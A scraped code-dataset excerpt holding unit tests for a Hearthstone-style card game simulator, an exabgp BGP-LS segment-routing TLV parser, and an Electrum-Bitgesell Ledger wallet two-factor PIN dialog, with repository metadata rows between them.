self.assertEqual(2, len(game.players[0].minions))
def test_ForkedLightning(self):
game = generate_game_for(ForkedLightning, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(2, len(game.players[1].minions))
# Forked Lightning should be played
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(2, game.players[0].upcoming_overload)
def test_FrostShock(self):
game = generate_game_for(FrostShock, StonetuskBoar, CardTestingAgent, DoNothingAgent)
# Frost Shock should be played
game.play_single_turn()
self.assertEqual(29, game.players[1].hero.health)
self.assertTrue(game.players[1].hero.frozen)
def test_Hex(self):
game = generate_game_for(ChillwindYeti, Hex, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertFalse(game.players[0].minions[0].taunt)
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(5, game.players[0].minions[0].health)
self.assertEqual("Chillwind Yeti", game.players[0].minions[0].card.name)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual(0, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual("Frog", game.players[0].minions[0].card.name)
self.assertEqual(MINION_TYPE.BEAST, game.players[0].minions[0].card.minion_type)
def test_LavaBurst(self):
game = generate_game_for(LavaBurst, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(25, game.players[1].hero.health)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_LightningBolt(self):
game = generate_game_for(LightningBolt, StonetuskBoar, CardTestingAgent, DoNothingAgent)
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_LightningStorm(self):
game = generate_game_for(LightningStorm, Shieldbearer, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
# Lightning Storm should be played
game.play_single_turn()
self.assertEqual(3, len(game.players[1].minions))
self.assertEqual(1, game.players[1].minions[0].health)
self.assertEqual(2, game.players[1].minions[1].health)
self.assertEqual(2, game.players[1].minions[2].health)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_RockbiterWeapon(self):
game = generate_game_for(RockbiterWeapon, Shieldbearer, PlayAndAttackAgent, DoNothingAgent)
self.assertEqual(30, game.players[1].hero.health)
# Rockbiter Weapon should be played and used
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
def test_RockbiterWeapon_and_Hex(self):
game = generate_game_for([IronfurGrizzly, RockbiterWeapon, Hex], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Frog", game.current_player.minions[0].card.name)
def test_RockbiterWeapon_and_BaronGeddon(self):
game = generate_game_for([BaronGeddon, RecklessRocketeer, RockbiterWeapon], StonetuskBoar,
PlayAndAttackAgent, DoNothingAgent)
for turn in range(15):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Baron Geddon", game.current_player.minions[0].card.name)
self.assertEqual(11, game.other_player.hero.health)
def test_TotemicMight(self):
game = generate_game_for([TotemicMight, StonetuskBoar], Shieldbearer, PredictableAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Stonetusk Boar", game.players[0].minions[0].card.name)
# Hero power and Totemic Might should be played
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_max_health())
self.assertEqual("Stoneclaw Totem", game.players[0].minions[1].card.name)
self.assertEqual(4, game.players[0].minions[1].calculate_max_health())
def test_Windfury(self):
game = generate_game_for(Windfury, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertFalse(game.players[1].minions[0].windfury())
# Windfury should be played
game.play_single_turn()
self.assertTrue(game.players[1].minions[0].windfury())
def test_Doomhammer(self):
game = generate_game_for(Doomhammer, StonetuskBoar, PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
self.assertFalse(game.players[0].hero.windfury())
# Doomhammer should be played
game.play_single_turn()
self.assertTrue(game.players[0].hero.windfury())
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(6, game.players[0].weapon.durability)
self.assertEqual(2, game.players[0].upcoming_overload)
self.assertEqual(26, game.players[1].hero.health)
def test_StormforgedAxe(self):
game = generate_game_for(StormforgedAxe, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(3, game.players[0].weapon.durability)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_Crackle(self):
game = generate_game_for(Crackle, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(25, game.players[1].hero.health)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_SiltfinSpiritwalker(self):
game = generate_game_for([MurlocTidecaller, MurlocTidehunter, SiltfinSpiritwalker, Deathwing],
[MurlocTidecaller, Hellfire, BaneOfDoom], OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(1, len(game.current_player.minions))
# Play Siltfin
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(4, len(game.current_player.hand))
self.assertEqual(7, len(game.other_player.hand))
# Hellfire will kill all the murlocs but the siltfin.
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(7, len(game.other_player.hand))
self.assertEqual(0, len(game.current_player.minions))
self.assertEqual(7, len(game.current_player.hand))
def test_WhirlingZapOMatic(self):
game = generate_game_for(WhirlingZapomatic, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Whirling Zap-o-matic", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
def test_DunemaulShaman(self):
game = generate_game_for(DunemaulShaman,
[StonetuskBoar, GoldshireFootman, SilverbackPatriarch, MogushanWarden],
PlayAndAttackAgent, OneCardPlayingAgent)
for turn in range(7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, len(game.other_player.minions))
game.play_single_turn()
# The shaman's forgetful ability triggers once. It hits the warden one time (its intended target)
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual("Mogu'shan Warden", game.other_player.minions[0].card.name)
self.assertEqual("Silverback Patriarch", game.other_player.minions[1].card.name)
self.assertEqual("Stonetusk Boar", game.other_player.minions[2].card.name)
self.assertEqual(30, game.other_player.hero.health)
def test_Powermace(self):
game = generate_game_for([Powermace, SpiderTank, SpiderTank], Wisp, PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(3, game.players[0].weapon.base_attack)
self.assertEqual(1, game.players[0].weapon.durability)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(24, game.players[1].hero.health)
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
def test_Neptulon(self):
game = generate_game_for([TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin,
Neptulon], Wisp, CardTestingAgent, DoNothingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
self.assertEqual(0, len(game.players[0].hand))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[0].hand))
for card in game.players[0].hand:
self.assertEqual(MINION_TYPE.MURLOC, card.minion_type)
def test_AncestorsCall(self):
game = generate_game_for([AncestorsCall, StonetuskBoar], [Doomguard, Soulfire],
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Stonetusk Boar", game.current_player.minions[0].card.name)
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual("Doomguard", game.other_player.minions[0].card.name)
self.assertEqual(5, len(game.current_player.hand))
self.assertEqual(7, len(game.other_player.hand))
def test_LavaShock(self):
game = generate_game_for([Doomhammer, LightningBolt, LavaShock], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(11):
game.play_single_turn()
# The player should have been able to do everything AND have three mana left over
self.assertEqual(25, game.other_player.hero.health)
self.assertEqual(3, game.current_player.mana)
def test_FireguardDestroyer(self):
game = generate_game_for(FireguardDestroyer, Wisp, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(6, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(5, len(game.players[0].minions))
self.assertEqual(6, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(6, len(game.players[0].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(7, len(game.players[0].minions)) # Well, I was trying to get a 7/6 but no luck
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
def test_AncestralKnowledge(self):
game = generate_game_for(AncestralKnowledge, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(6, len(game.current_player.hand))
self.assertEqual(2, game.current_player.upcoming_overload)
| true
| true
|
1c4208b6ad9a7e5b1a47d5852047900afcc2793d
| 3,146
|
py
|
Python
|
lib/exabgp/bgp/message/update/attribute/bgpls/link/sradjlan.py
|
fser/exabgp
|
9a41b5f833a00a4d56b1a38f73858d62685065dd
|
[
"BSD-3-Clause"
] | 2
|
2018-02-07T14:49:11.000Z
|
2021-09-08T15:31:51.000Z
|
lib/exabgp/bgp/message/update/attribute/bgpls/link/sradjlan.py
|
fser/exabgp
|
9a41b5f833a00a4d56b1a38f73858d62685065dd
|
[
"BSD-3-Clause"
] | null | null | null |
lib/exabgp/bgp/message/update/attribute/bgpls/link/sradjlan.py
|
fser/exabgp
|
9a41b5f833a00a4d56b1a38f73858d62685065dd
|
[
"BSD-3-Clause"
] | 1
|
2020-07-23T16:54:01.000Z
|
2020-07-23T16:54:01.000Z
|
# encoding: utf-8
"""
sradjlan.py
Created by Evelio Vila
Copyright (c) 2014-2017 Exa Networks. All rights reserved.
"""
import json
from struct import unpack
from exabgp.vendoring import six
from exabgp.vendoring.bitstring import BitArray
from exabgp.protocol.iso import ISO
from exabgp.bgp.message.update.attribute.bgpls.linkstate import LINKSTATE, LsGenericFlags
from exabgp.bgp.message.notification import Notify
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Flags | Weight | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | OSPF Neighbor ID / IS-IS System-ID |
# + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | SID/Label/Index (variable) |
# +---------------------------------------------------------------+
# draft-gredler-idr-bgp-ls-segment-routing-ext-03
@LINKSTATE.register()
class SrAdjacencyLan(object):
TLV = 1100
def __init__ (self, flags, sids, weight):
self.flags = flags
self.sids = sids
self.weight = weight
def __repr__ (self):
return "sr_adj_lan_flags: %s, sids: %s" % (self.flags, self.sids)
@classmethod
def unpack (cls,data,length):
# We only support IS-IS flags for now.
flags = LsGenericFlags.unpack(data[0:1],LsGenericFlags.ISIS_SR_ADJ_FLAGS)
# Parse adj weight
weight = six.indexbytes(data,1)
# Move pointer 4 bytes: Flags(1) + Weight(1) + Reserved(2)
data = data[4:]
isis_system_id = ISO.unpack_sysid(data[:6])
# SID/Index/Label: according to the V and L flags, it contains
# either:
# * A 3 octet local label where the 20 rightmost bits are used for
# encoding the label value. In this case the V and L flags MUST
# be set.
#
# * A 4 octet index defining the offset in the SID/Label space
# advertised by this router using the encodings defined in
# Section 3.1. In this case V and L flags MUST be unset.
sids = []
while data:
# Range Size: 3 octet value indicating the number of labels in
# the range.
if int(flags.flags['V']) and int(flags.flags['L']):
b = BitArray(bytes=data[:3])
sid = b.unpack('uintbe:24')[0]
data = data[3:]
elif (not flags.flags['V']) and \
(not flags.flags['L']):
sid = unpack('!I',data[:4])[0]
data = data[4:]
sids.append(sid)
return cls(flags=flags, sids=sids, weight=weight)
def json (self,compact=None):
return ', '.join(['"sr-adj-lan-flags": {}'.format(self.flags.json()),
'"sids": {}'.format(json.dumps(self.sids)),
'"sr-adj-lan-weight": {}'.format(json.dumps(self.weight))])
| 36.581395
| 89
| 0.508264
|
import json
from struct import unpack
from exabgp.vendoring import six
from exabgp.vendoring.bitstring import BitArray
from exabgp.protocol.iso import ISO
from exabgp.bgp.message.update.attribute.bgpls.linkstate import LINKSTATE, LsGenericFlags
from exabgp.bgp.message.notification import Notify
@LINKSTATE.register()
class SrAdjacencyLan(object):
TLV = 1100
def __init__ (self, flags, sids, weight):
self.flags = flags
self.sids = sids
self.weight = weight
def __repr__ (self):
return "sr_adj_lan_flags: %s, sids: %s" % (self.flags, self.sids)
@classmethod
def unpack (cls,data,length):
flags = LsGenericFlags.unpack(data[0:1],LsGenericFlags.ISIS_SR_ADJ_FLAGS)
weight = six.indexbytes(data,1)
data = data[4:]
isis_system_id = ISO.unpack_sysid(data[:6])
sids = []
while data:
if int(flags.flags['V']) and int(flags.flags['L']):
b = BitArray(bytes=data[:3])
sid = b.unpack('uintbe:24')[0]
data = data[3:]
elif (not flags.flags['V']) and \
(not flags.flags['L']):
sid = unpack('!I',data[:4])[0]
data = data[4:]
sids.append(sid)
return cls(flags=flags, sids=sids, weight=weight)
def json (self,compact=None):
return ', '.join(['"sr-adj-lan-flags": {}'.format(self.flags.json()),
'"sids": {}'.format(json.dumps(self.sids)),
'"sr-adj-lan-weight": {}'.format(json.dumps(self.weight))])
| true
| true
|
1c4209296b5062a78da810907578479114e202ca
| 7,060
|
py
|
Python
|
electrum/plugins/ledger/auth2fa.py
|
lucasan123/electrum-bitgesell
|
92eb2c28035aa96674d50b611ac9de0382adbc2b
|
[
"MIT"
] | null | null | null |
electrum/plugins/ledger/auth2fa.py
|
lucasan123/electrum-bitgesell
|
92eb2c28035aa96674d50b611ac9de0382adbc2b
|
[
"MIT"
] | 1
|
2020-08-26T20:31:21.000Z
|
2020-08-26T20:32:32.000Z
|
electrum/plugins/ledger/auth2fa.py
|
lucasan123/electrum-bitgesell
|
92eb2c28035aa96674d50b611ac9de0382adbc2b
|
[
"MIT"
] | null | null | null |
import copy
from PyQt5.QtWidgets import (QDialog, QLineEdit, QTextEdit, QVBoxLayout, QLabel,
QWidget, QHBoxLayout, QComboBox)
from btchip.btchip import BGLhipException
from electrum.gui.qt.util import PasswordLineEdit
from electrum.i18n import _
from electrum import constants, bitgesell
from electrum.logging import get_logger
_logger = get_logger(__name__)
DEBUG = False
helpTxt = [_("Your Ledger Wallet wants to tell you a one-time PIN code.<br><br>" \
"For best security you should unplug your device, open a text editor on another computer, " \
"put your cursor into it, and plug your device into that computer. " \
"It will output a summary of the transaction being signed and a one-time PIN.<br><br>" \
"Verify the transaction summary and type the PIN code here.<br><br>" \
"Before pressing enter, plug the device back into this computer.<br>" ),
_("Verify the address below.<br>Type the character from your security card corresponding to the <u><b>BOLD</b></u> character."),
]
class LedgerAuthDialog(QDialog):
def __init__(self, handler, data):
'''Ask user for 2nd factor authentication. Support text and security card methods.
Use last method from settings, but support downgrade.
'''
QDialog.__init__(self, handler.top_level_window())
self.handler = handler
self.txdata = data
self.idxs = self.txdata['keycardData'] if self.txdata['confirmationType'] > 1 else ''
self.setMinimumWidth(650)
self.setWindowTitle(_("Ledger Wallet Authentication"))
self.cfg = copy.deepcopy(self.handler.win.wallet.get_keystore().cfg)
self.dongle = self.handler.win.wallet.get_keystore().get_client().dongle
self.pin = ''
self.devmode = self.getDevice2FAMode()
if self.devmode == 0x11 or self.txdata['confirmationType'] == 1:
self.cfg['mode'] = 0
vbox = QVBoxLayout()
self.setLayout(vbox)
def on_change_mode(idx):
self.cfg['mode'] = 0 if self.devmode == 0x11 else idx if idx > 0 else 1
if self.cfg['mode'] > 0:
self.handler.win.wallet.get_keystore().cfg = self.cfg
self.handler.win.wallet.save_keystore()
self.update_dlg()
def return_pin():
self.pin = self.pintxt.text() if self.txdata['confirmationType'] == 1 else self.cardtxt.text()
if self.cfg['mode'] == 1:
self.pin = ''.join(chr(int(str(i),16)) for i in self.pin)
self.accept()
self.modebox = QWidget()
modelayout = QHBoxLayout()
self.modebox.setLayout(modelayout)
modelayout.addWidget(QLabel(_("Method:")))
self.modes = QComboBox()
modelayout.addWidget(self.modes, 2)
modelayout.addStretch(1)
self.modebox.setMaximumHeight(50)
vbox.addWidget(self.modebox)
self.populate_modes()
self.modes.currentIndexChanged.connect(on_change_mode)
self.helpmsg = QTextEdit()
self.helpmsg.setStyleSheet("QTextEdit { color:black; background-color: lightgray; }")
self.helpmsg.setReadOnly(True)
vbox.addWidget(self.helpmsg)
self.pinbox = QWidget()
pinlayout = QHBoxLayout()
self.pinbox.setLayout(pinlayout)
self.pintxt = PasswordLineEdit()
self.pintxt.setMaxLength(4)
self.pintxt.returnPressed.connect(return_pin)
pinlayout.addWidget(QLabel(_("Enter PIN:")))
pinlayout.addWidget(self.pintxt)
pinlayout.addWidget(QLabel(_("NOT DEVICE PIN - see above")))
pinlayout.addStretch(1)
self.pinbox.setVisible(self.cfg['mode'] == 0)
vbox.addWidget(self.pinbox)
self.cardbox = QWidget()
card = QVBoxLayout()
self.cardbox.setLayout(card)
self.addrtext = QTextEdit()
self.addrtext.setStyleSheet('''
QTextEdit {
color:blue; background-color:lightgray; padding:15px 10px; border:none;
font-size:20pt; font-family: "Courier New", monospace; }
''')
self.addrtext.setReadOnly(True)
self.addrtext.setMaximumHeight(130)
card.addWidget(self.addrtext)
def pin_changed(s):
if len(s) < len(self.idxs):
i = self.idxs[len(s)]
addr = self.txdata['address']
if not constants.net.TESTNET:
text = addr[:i] + '<u><b>' + addr[i:i+1] + '</u></b>' + addr[i+1:]
else:
# pin needs to be created from mainnet address
addr_mainnet = bitgesell.script_to_address(bitgesell.address_to_script(addr), net=constants.BitgesellMainnet)
addr_mainnet = addr_mainnet[:i] + '<u><b>' + addr_mainnet[i:i+1] + '</u></b>' + addr_mainnet[i+1:]
text = str(addr) + '\n' + str(addr_mainnet)
self.addrtext.setHtml(str(text))
else:
self.addrtext.setHtml(_("Press Enter"))
pin_changed('')
cardpin = QHBoxLayout()
cardpin.addWidget(QLabel(_("Enter PIN:")))
self.cardtxt = PasswordLineEdit()
self.cardtxt.setMaxLength(len(self.idxs))
self.cardtxt.textChanged.connect(pin_changed)
self.cardtxt.returnPressed.connect(return_pin)
cardpin.addWidget(self.cardtxt)
cardpin.addWidget(QLabel(_("NOT DEVICE PIN - see above")))
cardpin.addStretch(1)
card.addLayout(cardpin)
self.cardbox.setVisible(self.cfg['mode'] == 1)
vbox.addWidget(self.cardbox)
self.update_dlg()
def populate_modes(self):
self.modes.blockSignals(True)
self.modes.clear()
self.modes.addItem(_("Summary Text PIN (requires dongle replugging)") if self.txdata['confirmationType'] == 1 else _("Summary Text PIN is Disabled"))
if self.txdata['confirmationType'] > 1:
self.modes.addItem(_("Security Card Challenge"))
self.modes.blockSignals(False)
def update_dlg(self):
self.modes.setCurrentIndex(self.cfg['mode'])
self.modebox.setVisible(True)
self.helpmsg.setText(helpTxt[self.cfg['mode']])
self.helpmsg.setMinimumHeight(180 if self.txdata['confirmationType'] == 1 else 100)
self.helpmsg.setVisible(True)
self.pinbox.setVisible(self.cfg['mode'] == 0)
self.cardbox.setVisible(self.cfg['mode'] == 1)
self.pintxt.setFocus(True) if self.cfg['mode'] == 0 else self.cardtxt.setFocus(True)
self.setMaximumHeight(400)
def getDevice2FAMode(self):
apdu = [0xe0, 0x24, 0x01, 0x00, 0x00, 0x01] # get 2fa mode
try:
mode = self.dongle.exchange( bytearray(apdu) )
return mode
except BGLhipException as e:
_logger.debug('Device getMode Failed')
return 0x11
| 42.787879
| 157
| 0.610057
|
import copy
from PyQt5.QtWidgets import (QDialog, QLineEdit, QTextEdit, QVBoxLayout, QLabel,
QWidget, QHBoxLayout, QComboBox)
from btchip.btchip import BGLhipException
from electrum.gui.qt.util import PasswordLineEdit
from electrum.i18n import _
from electrum import constants, bitgesell
from electrum.logging import get_logger
_logger = get_logger(__name__)
DEBUG = False
helpTxt = [_("Your Ledger Wallet wants to tell you a one-time PIN code.<br><br>" \
"For best security you should unplug your device, open a text editor on another computer, " \
"put your cursor into it, and plug your device into that computer. " \
"It will output a summary of the transaction being signed and a one-time PIN.<br><br>" \
"Verify the transaction summary and type the PIN code here.<br><br>" \
"Before pressing enter, plug the device back into this computer.<br>" ),
_("Verify the address below.<br>Type the character from your security card corresponding to the <u><b>BOLD</b></u> character."),
]
class LedgerAuthDialog(QDialog):
def __init__(self, handler, data):
QDialog.__init__(self, handler.top_level_window())
self.handler = handler
self.txdata = data
self.idxs = self.txdata['keycardData'] if self.txdata['confirmationType'] > 1 else ''
self.setMinimumWidth(650)
self.setWindowTitle(_("Ledger Wallet Authentication"))
self.cfg = copy.deepcopy(self.handler.win.wallet.get_keystore().cfg)
self.dongle = self.handler.win.wallet.get_keystore().get_client().dongle
self.pin = ''
self.devmode = self.getDevice2FAMode()
if self.devmode == 0x11 or self.txdata['confirmationType'] == 1:
self.cfg['mode'] = 0
vbox = QVBoxLayout()
self.setLayout(vbox)
def on_change_mode(idx):
self.cfg['mode'] = 0 if self.devmode == 0x11 else idx if idx > 0 else 1
if self.cfg['mode'] > 0:
self.handler.win.wallet.get_keystore().cfg = self.cfg
self.handler.win.wallet.save_keystore()
self.update_dlg()
def return_pin():
self.pin = self.pintxt.text() if self.txdata['confirmationType'] == 1 else self.cardtxt.text()
if self.cfg['mode'] == 1:
self.pin = ''.join(chr(int(str(i),16)) for i in self.pin)
self.accept()
self.modebox = QWidget()
modelayout = QHBoxLayout()
self.modebox.setLayout(modelayout)
modelayout.addWidget(QLabel(_("Method:")))
self.modes = QComboBox()
modelayout.addWidget(self.modes, 2)
modelayout.addStretch(1)
self.modebox.setMaximumHeight(50)
vbox.addWidget(self.modebox)
self.populate_modes()
self.modes.currentIndexChanged.connect(on_change_mode)
self.helpmsg = QTextEdit()
self.helpmsg.setStyleSheet("QTextEdit { color:black; background-color: lightgray; }")
self.helpmsg.setReadOnly(True)
vbox.addWidget(self.helpmsg)
self.pinbox = QWidget()
pinlayout = QHBoxLayout()
self.pinbox.setLayout(pinlayout)
self.pintxt = PasswordLineEdit()
self.pintxt.setMaxLength(4)
self.pintxt.returnPressed.connect(return_pin)
pinlayout.addWidget(QLabel(_("Enter PIN:")))
pinlayout.addWidget(self.pintxt)
pinlayout.addWidget(QLabel(_("NOT DEVICE PIN - see above")))
pinlayout.addStretch(1)
self.pinbox.setVisible(self.cfg['mode'] == 0)
vbox.addWidget(self.pinbox)
self.cardbox = QWidget()
card = QVBoxLayout()
self.cardbox.setLayout(card)
self.addrtext = QTextEdit()
self.addrtext.setStyleSheet('''
QTextEdit {
color:blue; background-color:lightgray; padding:15px 10px; border:none;
font-size:20pt; font-family: "Courier New", monospace; }
''')
self.addrtext.setReadOnly(True)
self.addrtext.setMaximumHeight(130)
card.addWidget(self.addrtext)
def pin_changed(s):
if len(s) < len(self.idxs):
i = self.idxs[len(s)]
addr = self.txdata['address']
if not constants.net.TESTNET:
text = addr[:i] + '<u><b>' + addr[i:i+1] + '</u></b>' + addr[i+1:]
else:
addr_mainnet = bitgesell.script_to_address(bitgesell.address_to_script(addr), net=constants.BitgesellMainnet)
addr_mainnet = addr_mainnet[:i] + '<u><b>' + addr_mainnet[i:i+1] + '</u></b>' + addr_mainnet[i+1:]
text = str(addr) + '\n' + str(addr_mainnet)
self.addrtext.setHtml(str(text))
else:
self.addrtext.setHtml(_("Press Enter"))
pin_changed('')
cardpin = QHBoxLayout()
cardpin.addWidget(QLabel(_("Enter PIN:")))
self.cardtxt = PasswordLineEdit()
self.cardtxt.setMaxLength(len(self.idxs))
self.cardtxt.textChanged.connect(pin_changed)
self.cardtxt.returnPressed.connect(return_pin)
cardpin.addWidget(self.cardtxt)
cardpin.addWidget(QLabel(_("NOT DEVICE PIN - see above")))
cardpin.addStretch(1)
card.addLayout(cardpin)
self.cardbox.setVisible(self.cfg['mode'] == 1)
vbox.addWidget(self.cardbox)
self.update_dlg()
def populate_modes(self):
self.modes.blockSignals(True)
self.modes.clear()
self.modes.addItem(_("Summary Text PIN (requires dongle replugging)") if self.txdata['confirmationType'] == 1 else _("Summary Text PIN is Disabled"))
if self.txdata['confirmationType'] > 1:
self.modes.addItem(_("Security Card Challenge"))
self.modes.blockSignals(False)
def update_dlg(self):
self.modes.setCurrentIndex(self.cfg['mode'])
self.modebox.setVisible(True)
self.helpmsg.setText(helpTxt[self.cfg['mode']])
self.helpmsg.setMinimumHeight(180 if self.txdata['confirmationType'] == 1 else 100)
self.helpmsg.setVisible(True)
self.pinbox.setVisible(self.cfg['mode'] == 0)
self.cardbox.setVisible(self.cfg['mode'] == 1)
self.pintxt.setFocus(True) if self.cfg['mode'] == 0 else self.cardtxt.setFocus(True)
self.setMaximumHeight(400)
def getDevice2FAMode(self):
apdu = [0xe0, 0x24, 0x01, 0x00, 0x00, 0x01]
try:
mode = self.dongle.exchange( bytearray(apdu) )
return mode
except BGLhipException as e:
_logger.debug('Device getMode Failed')
return 0x11
| true
| true
|
1c42095fa66c2003f5d58eae607de990f19f42e8
| 565
|
py
|
Python
|
py_sys_test/ping_test/ping_icmp_test.py
|
interhui/py-sys
|
5d0f8cf5421a5766ed66d78a5364a017cb38aa3a
|
[
"Apache-2.0"
] | 1
|
2016-03-23T10:25:57.000Z
|
2016-03-23T10:25:57.000Z
|
py_sys_test/ping_test/ping_icmp_test.py
|
vicky-tan/py-sys
|
5d0f8cf5421a5766ed66d78a5364a017cb38aa3a
|
[
"Apache-2.0"
] | null | null | null |
py_sys_test/ping_test/ping_icmp_test.py
|
vicky-tan/py-sys
|
5d0f8cf5421a5766ed66d78a5364a017cb38aa3a
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import unittest
from py_sys.ping import ping_icmp
class Test(unittest.TestCase):
def test_ping(self):
p = ping_icmp.PingICMP()
result = p.ping('127.0.0.1', 1, 5)
for item in result:
self.assertEqual(item.get('result'), 'success')
def test_ping_timeout(self):
p = ping_icmp.PingICMP()
result = p.ping('192.168.1.2', 1, 5)
for item in result:
self.assertEqual(item.get('result'), 'timeout')
if __name__ == "__main__":
unittest.main()
| 28.25
| 60
| 0.573451
|
import unittest
from py_sys.ping import ping_icmp
class Test(unittest.TestCase):
def test_ping(self):
p = ping_icmp.PingICMP()
result = p.ping('127.0.0.1', 1, 5)
for item in result:
self.assertEqual(item.get('result'), 'success')
def test_ping_timeout(self):
p = ping_icmp.PingICMP()
result = p.ping('192.168.1.2', 1, 5)
for item in result:
self.assertEqual(item.get('result'), 'timeout')
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c420a026350f63f0fc65e8540cbbb62db2549ca
| 2,058
|
py
|
Python
|
_old_basic_tensorflow/tutorial2_simpleRegressionLowLevel/simpleRegressionLowLevel.py
|
UnnamedMoose/LearningMLandRL
|
a3a47998c32078a069ea82ce0032c30bb8b387f2
|
[
"MIT"
] | 2
|
2021-01-29T12:33:35.000Z
|
2021-07-11T05:47:26.000Z
|
